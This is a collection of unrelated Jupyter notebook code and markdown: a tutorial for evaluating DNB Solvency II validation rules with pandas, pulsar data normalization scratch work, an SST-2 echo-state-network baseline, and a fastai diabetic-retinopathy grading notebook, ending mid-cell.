sentence_probabilities = [sentence_count[sentence_tag]/total_count for sentence_tag in sentence_tags]
for i in range(0, 3):
random_sentence_chose = np.random.multinomial(1, sentence_probabilities)
random_sentence_index = list(random_sentence_chose).index(1)
print(sentences[sentence_tags[random_sentence_index]].generate(0))
```
The problem with this approach is that if the author uses a rich grammar (as is the case with Lovecraft), few phrases repeat grammatically,
so we get many unique tagged sentences, as happens here.
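The tag signature that keys the `sentences` dictionary can be illustrated without the corpus; the tagged pairs below are hand-written stand-ins for `nltk.pos_tag` output:

```python
# Hand-written stand-in for nltk.pos_tag output; joining the tags gives
# the "checksum" that groups structurally identical sentences.
tagged = [("the", "DT"), ("old", "JJ"), ("house", "NN"), ("creaked", "VBD")]
sentence_checksum = "-".join(tag for _, tag in tagged)
print(sentence_checksum)  # → DT-JJ-NN-VBD
```

Two sentences with the same tag sequence share a checksum, so their word counts merge; with a rich grammar almost every checksum occurs only once, which is exactly the problem measured next.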
```
print("{} sentences are available and there are {} unique sentences (almost all)".format(len(sentences), len([s for s, c in sentence_count.items() if c == 1])))
print("Sentences with more than one occurrence:")
for cs, count in sentence_count.items():
if count > 1:
print("{}: {} times".format(cs, count))
```
# Tutorial - Evaluate DNB's Additional Rules
This notebook contains a tutorial for the evaluation of DNB's additional rules for the following Solvency II reports:
- Annual Reporting Solo (ARS); and
- Quarterly Reporting Solo (QRS)
Besides the necessary preparation, the tutorial consists of 6 steps:
1. Read possible datapoints
2. Read data
3. Clean data
4. Read additional rules
5. Evaluate rules
6. Save results
## 0. Preparation
### Import packages
```
import pandas as pd # dataframes
import numpy as np # mathematical functions, arrays and matrices
from os.path import join, isfile # some os dependent functionality
import data_patterns # evaluation of patterns
import regex as re # regular expressions
from pprint import pprint # pretty print
import logging
```
### Variables
```
# ENTRYPOINT: 'ARS' for 'Annual Reporting Solo' or 'QRS' for 'Quarterly Reporting Solo'
# INSTANCE: Name of the report you want to evaluate the additional rules for
ENTRYPOINT = 'ARS'
INSTANCE = 'ars_240_instance' # Test instances: ars_240_instance or qrs_240_instance
# DATAPOINTS_PATH: path to the excel-file containing all possible datapoints (simplified taxonomy)
# RULES_PATH: path to the excel-file with the additional rules
# INSTANCES_DATA_PATH: path to the source data
# RESULTS_PATH: path to the results
DATAPOINTS_PATH = join('..', 'data', 'datapoints')
RULES_PATH = join('..', 'solvency2-rules')
INSTANCES_DATA_PATH = join('..', 'data', 'instances', INSTANCE)
RESULTS_PATH = join('..', 'results')
# We log to rules.log in the data/instances path
logging.basicConfig(filename = join(INSTANCES_DATA_PATH, 'rules.log'),level = logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
```
## 1. Read possible datapoints
In the data/datapoints directory there is a file for both ARS and QRS in which all possible datapoints are listed (simplified taxonomy).
We will use this information to add all unreported datapoints to the imported data.
```
df_datapoints = pd.read_csv(join(DATAPOINTS_PATH, ENTRYPOINT.upper() + '.csv'), sep=";").fillna("") # load file to dataframe
df_datapoints.head()
```
## 2. Read data
We distinguish 2 types of tables:
- With a closed-axis, e.g. the balance sheet: an entity reports only 1 balance sheet per period
- With an open-axis, e.g. the list of assets: an entity reports several 'rows of data' in the relevant table
### General information
First we gather some general information:
- A list of all possible reported tables
- A list of all reported tables
- A list of all tables that have not been reported
```
tables_complete_set = df_datapoints.tabelcode.sort_values().unique().tolist()
tables_reported = [table for table in tables_complete_set if isfile(join(INSTANCES_DATA_PATH, table + '.pickle'))]
tables_not_reported = [table for table in tables_complete_set if table not in tables_reported]
```
### Closed-axis
Besides all separate tables, the 'Tutorial Convert XBRL-instance to CSV, HTML and pickles' also outputs a large dataframe with the data from all closed-axis tables combined.
We use this dataframe for evaluating the patterns on closed-axis tables.
```
df_closed_axis = pd.read_pickle(join(INSTANCES_DATA_PATH, INSTANCE + '.pickle'))
tables_closed_axis = sorted(list(set(x[:13] for x in df_closed_axis.columns)))
df_closed_axis.head()
```
### Open-axis
For open-axis tables we create a dictionary with all data per table.
Later we will evaluate the additional rules on each separate table in this dictionary.
```
dict_open_axis = {}
tables_open_axis = [table for table in tables_reported if table not in tables_closed_axis]
for table in tables_open_axis:
df = pd.read_pickle(join(INSTANCES_DATA_PATH, table + '.pickle'))
# Identify which columns within the open-axis table make a table row unique (index-columns):
index_columns_open_axis = [col for col in list(df.index.names) if col not in ['entity','period']]
# Duplicate index-columns to data columns:
df.reset_index(level=index_columns_open_axis, inplace=True)
for i in range(len(index_columns_open_axis)):
df['index_col_' + str(i)] = df[index_columns_open_axis[i]].astype(str)
df.set_index(['index_col_' + str(i)], append=True, inplace=True)
dict_open_axis[table] = df
print("Open-axis tables:")
print(list(dict_open_axis.keys()))
```
## 3. Clean data
We have to make 2 modifications on the data:
1. Add unreported datapoints
so rules (partly) pointing to unreported datapoints can still be evaluated
2. Change string values to uppercase
because the additional rules are defined using capital letters for textual comparisons
```
all_datapoints = [x.replace(',,',',') for x in
list(df_datapoints['tabelcode'] + ',' + df_datapoints['rij'] + ',' + df_datapoints['kolom'])]
all_datapoints_closed = [x for x in all_datapoints if x[:13] in tables_closed_axis]
all_datapoints_open = [x for x in all_datapoints if x[:13] in tables_open_axis]
```
### Closed-axis tables
```
# add not reported datapoints to the dataframe with data from closed axis tables:
for col in [column for column in all_datapoints_closed if column not in list(df_closed_axis.columns)]:
df_closed_axis[col] = np.nan
df_closed_axis.fillna(0, inplace = True)
# string values to uppercase
df_closed_axis = df_closed_axis.applymap(lambda s:s.upper() if type(s) == str else s)
```
### Open-axis tables
```
for table in [table for table in dict_open_axis.keys()]:
all_datapoints_table = [x for x in all_datapoints_open if x[:13] == table]
for col in [column for column in all_datapoints_table if column not in list(dict_open_axis[table].columns)]:
dict_open_axis[table][col] = np.nan
dict_open_axis[table].fillna(0, inplace = True)
dict_open_axis[table] = dict_open_axis[table].applymap(lambda s:s.upper() if type(s) == str else s)
```
## 4. Read additional rules
DNB's additional validation rules are published as an Excel file on the DNB statistics website.
We included the Excel file in the project under data/downloaded files.
The rules are already converted to a syntax Python can interpret, using the notebook: 'Convert DNBs Additional Validation Rules to Patterns'.
In the next line of code we read these converted rules (patterns).
```
df_patterns = pd.read_excel(join(RULES_PATH, ENTRYPOINT.lower() + '_patterns_additional_rules.xlsx'), engine='openpyxl').fillna("").set_index('index')
```
## 5. Evaluate rules
### Closed-axis tables
To be able to evaluate the rules for closed-axis tables, we need to filter out:
- patterns for open-axis tables; and
- patterns pointing to tables that are not reported.
```
df_patterns_closed_axis = df_patterns.copy()
df_patterns_closed_axis = df_patterns_closed_axis[df_patterns_closed_axis['pandas ex'].apply(
lambda expr: not any(table in expr for table in tables_not_reported)
and not any(table in expr for table in tables_open_axis))]
df_patterns_closed_axis.head()
```
We now have:
- the data for closed-axis tables in a dataframe;
- the patterns for closed-axis tables in a dataframe.
To evaluate the patterns we need to create a 'PatternMiner' (part of the data_patterns package), and run the analyze function.
```
miner = data_patterns.PatternMiner(df_patterns=df_patterns_closed_axis)
df_results_closed_axis = miner.analyze(df_closed_axis)
df_results_closed_axis.head()
```
### Open-axis tables
First find the patterns defined for open-axis tables
```
df_patterns_open_axis = df_patterns.copy()
df_patterns_open_axis = df_patterns_open_axis[df_patterns_open_axis['pandas ex'].apply(
lambda expr: any(table in expr for table in tables_open_axis))]
```
Patterns involving multiple open-axis tables are not yet supported
```
df_patterns_open_axis = df_patterns_open_axis[df_patterns_open_axis['pandas ex'].apply(
lambda expr: len(set(re.findall('S.\d\d.\d\d.\d\d.\d\d',expr)))) == 1]
df_patterns_open_axis.head()
```
Next we loop through the open-axis tables and evaluate the corresponding patterns on the data
```
output_open_axis = {} # dictionary with input and results per table
for table in tables_open_axis: # loop through open-axis tables
if df_patterns_open_axis['pandas ex'].apply(lambda expr: table in expr).sum() > 0: # check if there are patterns
info = {}
info['data'] = dict_open_axis[table] # select data
info['patterns'] = df_patterns_open_axis[df_patterns_open_axis['pandas ex'].apply(
lambda expr: table in expr)] # select patterns
miner = data_patterns.PatternMiner(df_patterns=info['patterns'])
info['results'] = miner.analyze(info['data']) # evaluate patterns
output_open_axis[table] = info
```
Print results for the first table (if there are rules for tables with an open axis)
```
if len(output_open_axis.keys()) > 0:
display(output_open_axis[list(output_open_axis.keys())[0]]['results'].head())
```
## 6. Save results
### Combine results for closed- and open-axis tables
To output the results in a single file, we want to combine the results for closed-axis and open-axis tables
```
# Function to transform results for open-axis tables, so it can be appended to results for closed-axis tables
# The 'extra' index columns are converted to data columns
def transform_results_open_axis(df):
if df.index.nlevels > 2:
reset_index_levels = list(range(2, df.index.nlevels))
df = df.reset_index(level=reset_index_levels)
rename_columns={}
for x in reset_index_levels:
rename_columns['level_' + str(x)] = 'id_column_' + str(x - 1)
df.rename(columns=rename_columns, inplace=True)
return df
df_results = df_results_closed_axis.copy() # results for closed axis tables
for table in list(output_open_axis.keys()): # for all open axis tables with rules -> append and sort results
    # DataFrame.append was removed in pandas 2.0; pd.concat does the same job
    df_results = pd.concat([transform_results_open_axis(output_open_axis[table]['results']), df_results], sort=False).sort_values(by=['pattern_id']).sort_index()
```
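To see what `transform_results_open_axis` does, here is a toy example with made-up data: the levels of a results index beyond the first two are moved into `id_column_*` data columns.

```python
import pandas as pd

# Toy results frame with a 3-level index; the third (unnamed) level plays
# the role of the 'extra' open-axis identifier
idx = pd.MultiIndex.from_tuples([('p1', 'r1', 'k1'), ('p1', 'r1', 'k2')])
df = pd.DataFrame({'result_type': [True, False]}, index=idx)

# Same transformation as above: move index level 2 into a data column
# (pandas names an unnamed reset level 'level_2')
df2 = df.reset_index(level=[2]).rename(columns={'level_2': 'id_column_1'})
print(df2.columns.tolist())  # ['id_column_1', 'result_type']
```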
Change column order so the dataframe starts with the identifying columns:
```
list_col_order = []
for i in range(1, len([col for col in list(df_results.columns) if col[:10] == 'id_column_']) + 1):
list_col_order.append('id_column_' + str(i))
list_col_order.extend(col for col in list(df_results.columns) if col not in list_col_order)
df_results = df_results[list_col_order]
df_results.head()
```
### Save results
The dataframe df_results contains all output of the evaluation of the validation rules.
```
# To save all results use df_results
# To save only the exceptions, filter with df_results[df_results['result_type'] == False]
# To save only the confirmations, filter with df_results[df_results['result_type'] == True]
# Here we save only the exceptions to the validation rules
df_results[df_results['result_type']==False].to_excel(join(RESULTS_PATH, "results.xlsx"))
```
### Example of an error in the report
```
# Get the pandas code from the pattern with index 4 and evaluate it
s = df_patterns.loc[4, 'pandas ex'].replace('df', 'df_closed_axis')
print('Pattern:', s)
display(eval(s)[re.findall(r'S.\d\d.\d\d.\d\d.\d\d,R\d\d\d\d,C\d\d\d\d', s)])
```
---
```
import numpy as np
%matplotlib inline
import matplotlib.pyplot as plt
def normalize(fold_data, icount_data): # function for normalizing folded pulse data
    norm_data = np.zeros_like(fold_data) # initialize array for normalized data
    for i in range(fold_data.shape[-1]): # loop over the last axis of the folded data to fill norm_data
        norm_data[:,:,:,i] = fold_data[:,:,:,i]/icount_data[:,:,:] # normalize data
    return norm_data
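The loop in `normalize` can also be replaced by NumPy broadcasting; this is an independent sketch (`normalize_vec` is a made-up name, not from the original notebook), which additionally guards against dividing by zero where no counts were recorded.

```python
import numpy as np

# Vectorized alternative to normalize(): adding a trailing axis to the count
# array lets it broadcast over the last axis of the folded data, and np.where
# returns 0 wherever the counts are 0 instead of dividing by zero.
def normalize_vec(fold_data, icount_data):
    counts = icount_data[..., np.newaxis]  # shape (..., 1) for broadcasting
    safe = np.where(counts > 0, counts, 1)
    return np.where(counts > 0, fold_data / safe, 0.0)

fold = np.arange(24, dtype=float).reshape(2, 3, 2, 2)
icount = np.full((2, 3, 2), 2.0)
out = normalize_vec(fold, icount)  # every sample divided by its count of 2
```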
start = "arochime-invpfbB0329+54_32768chan3ntbin"
fold = "foldspec_2018-08-16T10:"
icount = "icount_2018-08-16T10:"
end = ".000+30.000000000000004sec"
#final code will look something like:
#need to add plotting line, need to add second for loop for strings with :00 instead of :30
# i = 0
# for filename in filenames:
# fold = np.load(start+fold+str(i+38)+":"+str(30)+end+".npy")
# count = np.load(start+icount+str(i+38)+":"+str(30)+end+".npy")
# norm = normalize(fold,count)
# #plotting line
# plt.savefig(start+fold+str(i+38)+":"+str(30)+end+".png")
# i = i+1
test = np.load(start+fold+str(38)+":"+str(30)+end+".npy")
#what metadata reads:
#arochime - data from arochime
#invpfb - something specific to arochime???????
#B0329+54 - pulsar name
#32768 - number of entries in the frequency axis
#chan3t - ???????????
#foldspec/icount - folded pulse signals or icount data
#_2018_08-16 - date at which data was taken
#T - time
#10:38:30.00 - 10 O'clock and 38 minutes and 30 seconds
#30.000000000000004sec - data taken over 30 second interval?????????
#.npy - filetype
data1 = np.load("arochime-invpfbB0329+54_32768chan3ntbinfoldspec_2018-08-16T10:38:30.000+30.000000000000004sec.npy")
data2 = np.load("arochime-invpfbB0329+54_32768chan3ntbinicount_2018-08-16T10:38:30.000+30.000000000000004sec.npy")
data3 = np.load("arochime-invpfbB0329+54_32768chan3ntbinfoldspec_2018-08-16T10:39:00.000+30.000000000000004sec.npy")
data4 = np.load("arochime-invpfbB0329+54_32768chan3ntbinicount_2018-08-16T10:39:00.000+30.000000000000004sec.npy")
new_data = normalize(data1,data2)
#print(new_data[0,0,:,0]) #phase x
#print(new_data[0,:,0,0]) #frequency y
#plt.plot(new_data[0,0,:,0],new_data[0,:,0,0])
ndata = np.zeros_like(data2)
ndata2 = np.zeros_like(data1)
for i in range(data1.shape[-1]):
    ndata2[:,:,:,i] = data1[:,:,:,i]/data2[:,:,:]
#print(ndata2)
#################### EVERYTHING BELOW IS SCRATCH WORK ############################
len(data1)
print(data1[0,:,0,0])
#print(data1[0,0,:,0])
print(data1[:,0,1,0])
plt.figure(figsize=(16,9))
for i in range(len(data1)):
for j in range(len(data1[0,0,:,0])):
plt.plot(data2[i,:,j],data1[i,:,j,0], 'o')
#plt.xlim(237,240)
plt.savefig('fig1.png')
%time
%time
test1 = np.zeros_like(data1) # must be initialized before the accumulation below
interm = np.zeros_like(data1)
for i in range(len(data1)):
    for j in range(len(data1[0,0,:,0])):
        test1[i,:,j,0] = test1[i,:,j,0]+data1[i,:,j,0]
#plt.xlim(237,240)
%time
#test1 = np.zeros_like(data1)
test_01 = np.zeros(len(data1[0,:,0,0]))
interm = np.zeros_like(data1)
for i in range(len(data1)):
for j in range(len(data1[0,0,:,0])):
test_01 = test_01+data1[i,:,j,0]
#plt.xlim(237,240)
plt.figure(figsize=(16,9))
for i in range(len(data1)):
plt.plot(data2[i,:,0],test_01, 'o')
plt.savefig('fig2.png')
%time
print(len(test1[0,0,:,0]))
plt.figure(figsize=(16,9))
for i in range(len(data1)):
plt.plot(data2[i,:,j],test1[i,:,j,0], 'o')
plt.savefig('fig2.png')
%time
```
---
# SST-2
# Simple Baselines using ``mean`` and ``last`` pooling
## Libraries
```
# !pip install transformers==4.8.2
# !pip install datasets==1.7.0
# !pip install ax-platform==0.1.20
import os
import sys
sys.path.insert(0, os.path.abspath("../..")) # comment this if library is pip installed
import io
import re
import pickle
from timeit import default_timer as timer
from tqdm.notebook import tqdm
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from datasets import load_dataset, Dataset, concatenate_datasets
from transformers import AutoTokenizer
from transformers import BertModel
from transformers.data.data_collator import DataCollatorWithPadding
from ax.plot.contour import plot_contour
from ax.plot.trace import optimization_trace_single_method
from ax.service.managed_loop import optimize
from ax.utils.notebook.plotting import render, init_notebook_plotting
import esntorch.core.reservoir as res
import esntorch.core.learning_algo as la
import esntorch.core.merging_strategy as ms
import esntorch.core.esn as esn
%config Completer.use_jedi = False
%load_ext autoreload
%autoreload 2
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
device
SEED = 42
```
## Global variables
```
CACHE_DIR = '~/Data/huggignface/' # put your path here
RESULTS_FILE = 'Results/Baselines_v2/sst-2_results_.pkl' # put your path here
```
## Dataset
```
# download dataset
# full train, mini train, and val sets
raw_datasets = load_dataset('glue', 'sst2', cache_dir=CACHE_DIR)
raw_datasets = raw_datasets.rename_column('sentence', 'text')
full_train_dataset = raw_datasets['train']
train_dataset = full_train_dataset.train_test_split(train_size=0.3, shuffle=True)['train']
val_dataset = raw_datasets['validation']
# special test set
test_dataset = load_dataset('gpt3mix/sst2', split='test', cache_dir=CACHE_DIR)
def clean(example):
example['text'] = example['text'].replace('-LRB-', '(').replace('-RRB-', ')').replace(r'\/', r'/')
example['label'] = np.abs(example['label'] - 1) # revert labels of test set
return example
test_dataset = test_dataset.map(clean)
# create dataset_d
dataset_d = {}
dataset_d = {
'full_train': full_train_dataset,
'train': train_dataset,
'val': val_dataset,
'test': test_dataset
}
dataset_d
# tokenize
tokenizer = AutoTokenizer.from_pretrained("bert-base-uncased")
def tokenize_function(examples):
return tokenizer(examples["text"], padding=False, truncation=True, return_length=True)
for k, v in dataset_d.items():
tmp = v.map(tokenize_function, batched=True)
tmp = tmp.rename_column('length', 'lengths')
tmp = tmp.sort("lengths")
tmp = tmp.rename_column('label', 'labels')
tmp.set_format(type='torch', columns=['input_ids', 'attention_mask', 'labels', 'lengths'])
dataset_d[k] = tmp
# dataloaders
dataloader_d = {}
for k, v in dataset_d.items():
dataloader_d[k] = torch.utils.data.DataLoader(v, batch_size=256, collate_fn=DataCollatorWithPadding(tokenizer))
dataset_d
```
## Optimization
```
baseline_params = {
'embedding_weights': 'bert-base-uncased', # TEXT.vocab.vectors,
'distribution' : 'uniform', # uniform, gaussian
'input_dim' : 768, # dim of encoding!
'reservoir_dim' : 0, # not used
'bias_scaling' : 0.0, # not used
'sparsity' : 0.0, # not used
'spectral_radius' : None,
'leaking_rate': 0.5, # not used
'activation_function' : 'tanh',
'input_scaling' : 0.1,
'mean' : 0.0,
'std' : 1.0,
'learning_algo' : None,
'criterion' : None,
'optimizer' : None,
'merging_strategy' : None,
'lexicon' : None,
'bidirectional' : False,
'mode' : 'no_layer', # simple baseline
'device' : device,
'seed' : 4
}
results_d = {}
for pooling_strategy in tqdm(['last', 'mean']):
results_d[pooling_strategy] = {}
for alpha in tqdm([0.1, 1.0, 10.0, 100.0]):
results_d[pooling_strategy][alpha] = []
# model
baseline_params['merging_strategy'] = pooling_strategy
baseline_params['mode'] = 'no_layer'
print(baseline_params)
ESN = esn.EchoStateNetwork(**baseline_params)
ESN.learning_algo = la.RidgeRegression(alpha=alpha)
ESN = ESN.to(device)
# train
t0 = timer()
LOSS = ESN.fit(dataloader_d["full_train"]) # full train set
t1 = timer()
acc = ESN.predict(dataloader_d["test"], verbose=False)[1].item() # full test set
# results
results_d[pooling_strategy][alpha].append([acc, t1 - t0])
# clean objects
del ESN.learning_algo
del ESN.criterion
del ESN.merging_strategy
del ESN
torch.cuda.empty_cache()
results_d
```
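The `mean` and `last` pooling strategies compared above can be illustrated on a padded batch of per-token states. This is an independent sketch (the `pool` helper is made up, not the esntorch implementation): `mean` averages over the valid tokens of each sequence, while `last` takes the final valid token's state.

```python
import numpy as np

def pool(states, lengths, strategy):
    # states: (batch, max_len, dim); lengths: (batch,) true sequence lengths
    batch, max_len, dim = states.shape
    mask = np.arange(max_len)[None, :] < lengths[:, None]  # (batch, max_len)
    if strategy == 'mean':
        # zero out the padding positions, then average over the valid tokens
        return (states * mask[..., None]).sum(axis=1) / lengths[:, None]
    elif strategy == 'last':
        # pick the state at the last valid position of each sequence
        return states[np.arange(batch), lengths - 1]

states = np.ones((2, 4, 3))
states[0, 2:] = 0.0               # padding for a length-2 sequence
lengths = np.array([2, 4])
print(pool(states, lengths, 'mean')[0])  # averages only the 2 valid tokens
```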
## Results
```
# save results
with open(RESULTS_FILE, 'wb') as fh:
pickle.dump(results_d, fh)
# # load results
# with open(os.path.join(RESULTS_PATH, RESULTS_FILE), 'rb') as fh:
# results_d = pickle.load(fh)
# results_d
```
---
- https://www.kaggle.com/tanlikesmath/intro-aptos-diabetic-retinopathy-eda-starter
- https://medium.com/@btahir/a-quick-guide-to-using-regression-with-image-data-in-fastai-117304c0af90
- add diabetic-retinopathy-detection training data (cropped)
# params
```
PRFX = 'CvCropDiabtrn070314'
p_prp = '../output/Prep0703'
p_o = f'../output/{PRFX}'
SEED = 111
dbg = False
if dbg:
dbgsz = 500
BS = 256
SZ = 224
FP16 = True
import multiprocessing
multiprocessing.cpu_count() # 2
from fastai.vision import *
xtra_tfms = []
# xtra_tfms += [rgb_randomize(channel=i, thresh=1e-4) for i in range(3)]
params_tfms = dict(
do_flip=True,
flip_vert=False,
max_rotate=10,
max_warp=0,
max_zoom=1.1,
p_affine=0.5,
max_lighting=0.2,
p_lighting=0.5,
xtra_tfms=xtra_tfms)
resize_method = ResizeMethod.CROP
padding_mode = 'zeros'
USE_TTA = True
```
# setup
```
import fastai
print('fastai.__version__: ', fastai.__version__)
import random
import numpy as np
import torch
import os
def set_torch_seed(seed=SEED):
os.environ['PYTHONHASHSEED'] = str(seed)
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if torch.cuda.is_available():
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
set_torch_seed()
from fastai import *
from fastai.vision import *
import pandas as pd
import scipy as sp
from sklearn.metrics import cohen_kappa_score
def quadratic_weighted_kappa(y1, y2):
return cohen_kappa_score(y1, y2, weights='quadratic')
```
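As a quick sanity check of this metric: perfect agreement between predictions and truth yields a kappa of 1, and the quadratic weighting penalizes disagreements more heavily the further apart the grades are.

```python
from sklearn.metrics import cohen_kappa_score

def quadratic_weighted_kappa(y1, y2):
    return cohen_kappa_score(y1, y2, weights='quadratic')

# Perfect agreement across the five retinopathy grades
print(quadratic_weighted_kappa([0, 1, 2, 3, 4], [0, 1, 2, 3, 4]))  # 1.0
```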
# preprocess
```
img2grd = []
p = '../input/aptos2019-blindness-detection'
pp = Path(p)
train = pd.read_csv(pp/'train.csv')
test = pd.read_csv(pp/'test.csv')
len_blnd = len(train)
len_blnd_test = len(test)
img2grd_blnd = [(f'{p_prp}/aptos2019-blindness-detection/train_images/{o[0]}.png',o[1]) for o in train.values]
len_blnd, len_blnd_test
img2grd += img2grd_blnd
display(len(img2grd))
display(Counter(o[1] for o in img2grd).most_common())
p = '../input/diabetic-retinopathy-detection'
pp = Path(p)
train=pd.read_csv(pp/'trainLabels.csv')
img2grd_diab_train=[(f'{p_prp}/diabetic-retinopathy-detection/train_images/{o[0]}.jpeg',o[1]) for o in train.values]
img2grd += img2grd_diab_train
display(len(img2grd))
display(Counter(o[1] for o in img2grd).most_common())
if np.all([Path(o[0]).exists() for o in img2grd]): print('All files are here!')
df = pd.DataFrame(img2grd)
df.columns = ['fnm', 'target']
df.shape
set_torch_seed()
idx_blnd_train = np.where(df.fnm.str.contains('aptos2019'))[0]
idx_val = np.random.choice(idx_blnd_train, len_blnd_test, replace=False)
df['is_val']=False
df.loc[idx_val, 'is_val']=True
if dbg:
df=df.head(dbgsz)
```
# dataset
```
tfms = get_transforms(**params_tfms)
def get_data(sz, bs):
src = (ImageList.from_df(df=df,path='./',cols='fnm')
.split_from_df(col='is_val')
.label_from_df(cols='target',
label_cls=FloatList)
)
data= (src.transform(tfms,
size=sz,
resize_method=resize_method,
padding_mode=padding_mode) #Data augmentation
.databunch(bs=bs) #DataBunch
.normalize(imagenet_stats) #Normalize
)
return data
bs = BS
sz = SZ
set_torch_seed()
data = get_data(sz, bs)
data.show_batch(rows=3, figsize=(7,6))
```
# model
```
%%time
# Downloading: "https://download.pytorch.org/models/resnet50-19c8e357.pth" to /tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth
# Making pretrained weights work without needing to find the default filename
if not os.path.exists('/tmp/.cache/torch/checkpoints/'):
os.makedirs('/tmp/.cache/torch/checkpoints/')
!cp '../input/pytorch-vision-pretrained-models/resnet50-19c8e357.pth' '/tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth'
learn = cnn_learner(data,
base_arch = models.resnet50,
path=p_o, ps=0.2)
learn.loss_func = MSELossFlat()  # fastai's Learner attribute is loss_func, and the loss must be instantiated
if FP16: learn = learn.to_fp16()
%%time
learn.freeze()
learn.lr_find()
learn.recorder.plot(suggestion=True)
learn.recorder.plot()
set_torch_seed()
learn.fit_one_cycle(4, max_lr = 1e-2)
learn.recorder.plot_losses()
# learn.recorder.plot_metrics()
learn.save('mdl-frozen')
learn.unfreeze()
%%time
learn.lr_find()
learn.recorder.plot(suggestion=True)
set_torch_seed()
learn.fit_one_cycle(6, max_lr=slice(1e-6,1e-3))
!nvidia-smi
learn.recorder.plot_losses()
# learn.recorder.plot_metrics()
learn.save('mdl')
```
# validate and thresholding
```
learn = learn.to_fp32()
learn = learn.load('mdl')
%%time
set_torch_seed()
preds_val_tta, y_val = learn.TTA(ds_type=DatasetType.Valid)
%%time
set_torch_seed()
preds_val, y_val = learn.get_preds(ds_type=DatasetType.Valid)
preds_val = preds_val.numpy().squeeze()
preds_val_tta = preds_val_tta.numpy().squeeze()
y_val= y_val.numpy()
np.save(f'{p_o}/preds_val.npy', preds_val)
np.save(f'{p_o}/preds_val_tta.npy', preds_val_tta)
np.save(f'{p_o}/y_val.npy', y_val)
# https://www.kaggle.com/c/petfinder-adoption-prediction/discussion/88773#latest-515044
# We used OptimizedRounder given by hocop1. https://www.kaggle.com/c/petfinder-adoption-prediction/discussion/76107#480970
# put numerical value to one of bins
def to_bins(x, borders):
for i in range(len(borders)):
if x <= borders[i]:
return i
return len(borders)
class Hocop1OptimizedRounder(object):
def __init__(self):
self.coef_ = 0
def _loss(self, coef, X, y, idx):
X_p = np.array([to_bins(pred, coef) for pred in X])
ll = -quadratic_weighted_kappa(y, X_p)
return ll
def fit(self, X, y):
coef = [1.5, 2.0, 2.5, 3.0]
golden1 = 0.618
golden2 = 1 - golden1
ab_start = [(1, 2), (1.5, 2.5), (2, 3), (2.5, 3.5)]
for it1 in range(10):
for idx in range(4):
# golden section search
a, b = ab_start[idx]
# calc losses
coef[idx] = a
la = self._loss(coef, X, y, idx)
coef[idx] = b
lb = self._loss(coef, X, y, idx)
for it in range(20):
# choose value
if la > lb:
a = b - (b - a) * golden1
coef[idx] = a
la = self._loss(coef, X, y, idx)
else:
b = b - (b - a) * golden2
coef[idx] = b
lb = self._loss(coef, X, y, idx)
self.coef_ = {'x': coef}
def predict(self, X, coef):
X_p = np.array([to_bins(pred, coef) for pred in X])
return X_p
def coefficients(self):
return self.coef_['x']
# https://www.kaggle.com/c/petfinder-adoption-prediction/discussion/76107#480970
class AbhishekOptimizedRounder(object):
def __init__(self):
self.coef_ = 0
def _kappa_loss(self, coef, X, y):
X_p = np.copy(X)
for i, pred in enumerate(X_p):
if pred < coef[0]:
X_p[i] = 0
elif pred >= coef[0] and pred < coef[1]:
X_p[i] = 1
elif pred >= coef[1] and pred < coef[2]:
X_p[i] = 2
elif pred >= coef[2] and pred < coef[3]:
X_p[i] = 3
else:
X_p[i] = 4
ll = quadratic_weighted_kappa(y, X_p)
return -ll
def fit(self, X, y):
loss_partial = partial(self._kappa_loss, X=X, y=y)
initial_coef = [0.5, 1.5, 2.5, 3.5]
self.coef_ = sp.optimize.minimize(loss_partial, initial_coef, method='nelder-mead')
def predict(self, X, coef):
X_p = np.copy(X)
for i, pred in enumerate(X_p):
if pred < coef[0]:
X_p[i] = 0
elif pred >= coef[0] and pred < coef[1]:
X_p[i] = 1
elif pred >= coef[1] and pred < coef[2]:
X_p[i] = 2
elif pred >= coef[2] and pred < coef[3]:
X_p[i] = 3
else:
X_p[i] = 4
return X_p
def coefficients(self):
return self.coef_['x']
def bucket(preds_raw, coef = [0.5, 1.5, 2.5, 3.5]):
preds = np.zeros(preds_raw.shape)
for i, pred in enumerate(preds_raw):
if pred < coef[0]:
preds[i] = 0
elif pred >= coef[0] and pred < coef[1]:
preds[i] = 1
elif pred >= coef[1] and pred < coef[2]:
preds[i] = 2
elif pred >= coef[2] and pred < coef[3]:
preds[i] = 3
else:
preds[i] = 4
return preds
optnm2coefs = {'simple': [0.5, 1.5, 2.5, 3.5]}
%%time
set_torch_seed()
optR = Hocop1OptimizedRounder()
optR.fit(preds_val_tta, y_val)
optnm2coefs['hocop1_tta'] = optR.coefficients()
%%time
set_torch_seed()
optR = Hocop1OptimizedRounder()
optR.fit(preds_val, y_val)
optnm2coefs['hocop1'] = optR.coefficients()
%%time
set_torch_seed()
optR = AbhishekOptimizedRounder()
optR.fit(preds_val_tta, y_val)
optnm2coefs['abhishek_tta'] = optR.coefficients()
%%time
set_torch_seed()
optR = AbhishekOptimizedRounder()
optR.fit(preds_val, y_val)
optnm2coefs['abhishek'] = optR.coefficients()
optnm2coefs
optnm2preds_val_grd = {k: bucket(preds_val, coef) for k,coef in optnm2coefs.items()}
optnm2qwk = {k: quadratic_weighted_kappa(y_val, preds) for k,preds in optnm2preds_val_grd.items()}
optnm2qwk
Counter(y_val).most_common()
preds_val_grd = optnm2preds_val_grd['abhishek'].squeeze()
preds_val_grd.mean()
Counter(preds_val_grd).most_common()
list(zip(preds_val_grd, y_val))[:10]
(preds_val_grd== y_val.squeeze()).mean()
import pickle
pickle.dump(optnm2qwk, open(f'{p_o}/optnm2qwk.p', 'wb'))
pickle.dump(optnm2preds_val_grd, open(f'{p_o}/optnm2preds_val_grd.p', 'wb'))
pickle.dump(optnm2coefs, open(f'{p_o}/optnm2coefs.p', 'wb'))
```
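The `bucket` function above is equivalent to `np.digitize` with the same thresholds: both assign grade `i` when `coef[i-1] <= pred < coef[i]`. A minimal sketch of that equivalence:

```python
import numpy as np

# The same thresholds used as the 'simple' coefficients above
coef = [0.5, 1.5, 2.5, 3.5]
preds_raw = np.array([0.2, 0.7, 1.9, 3.1, 4.5])

# np.digitize returns, for each value, the index of the bin it falls into,
# which is exactly the ordinal grade produced by bucket()
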